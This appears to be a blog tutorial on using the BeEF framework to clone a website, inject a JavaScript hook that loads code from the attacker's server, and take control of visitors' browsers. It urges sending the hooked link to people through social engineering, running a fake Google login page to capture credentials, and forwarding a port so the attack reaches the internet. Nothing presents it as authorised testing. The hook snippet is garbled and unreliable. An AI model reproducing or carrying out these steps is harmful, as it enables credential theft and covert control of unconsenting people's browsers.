Beef-XSS – Cloning websites

Posted by

if you don’t already have Kali Linux you can download it here. If you are using an alternative Linux distribution you will need to install Beef-XSS.

Join Our Discord Hacking Server: 

Invite Our Cybersec Bot:

Step 1:

Open up a new terminal in Kali Linux, enter command

 mkdir /usr/share/beef-xss/extensions/demos/html/websites/

Next we need to change into beef-xss working directory. We can do this by entering the command below in our terminal.

cd /usr/share/beefxss/extensions/demos/html/websites/

Step 2: Cloning Websites wget

Let’s clone a website to Beef-XSS, to clone website to beef we will be working will a utility called  wget.



Step 3: Adding Java Script Hook to Cloned Website

We can open and modify cloned html website using gedit.

gedit /usr/share/beef-xss/extensions/demos/html/websites/index.html

Add this simple piece of  java script below to the <head> of cloned html website.

var commandModuleStr = ‘<script src”‘ + window.location.proto + ‘//’ + + ‘” type=”text/javascript”>’;                                   document.write(commandModuleStr);
beef Usage Example

Start beef-xss in a terminal you can do this by typing beef-xss and press enter.

Open your local IP address in browser.

Change local IP address to 192.168.x.x or whatever your local host IP is here we are using

Step 4: Default Credentials for Beef

User: beef

Pass: beef

Now you have logged into beef framework let start hooking some browsers.

Send target browser to IP address that is hosting our beef hook.

Change local host IP to you localhost IP.

Once target browser opens up the website template we have hooked in beef. Target browser will then be added to hooked browsers in left side panel in beef framework.


You are now able to run commands on the targets pc using Beef’s built in modules.

Another beef  exploit command example

Now send this to anyone in our local network with some social engineering techniques. Whenever our target opens this link with a browser the browser will be hooked.

send this hooking url to our another PC and open this link there.  you got one online hooked browser in our attacker machine.

click over the hooked browser’s ip address.Now we are on current browser section. Here you can see all the details about our browser and we can run exploits.

To run exploit commands you need to navigate on the commands tab.

For an example we will run a basic exploit command on our hooked browser. go to social engineering menu and select the Google phishing and click on execute.

After clicking on execute in our target PC the following page is automatically comes.

Now if we enter credentials on targeted PC we got them on our attacker machine.

Not only creating phishing page crating BeEF have lots of advanced exploits. It can take snaps from webcam, it is dangerous when attacker integrated BeEF with metasploit.

Browser Exploitation Framework hooks the browser by a JavaScript inside a normal HTML page, it exposes restful API that allow BeEF to be scripted through HTTP/JSON requests.

To use BeEF over www you need to use ur external ip in the place of our internal ip address. you also need to forward default 3000 port.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.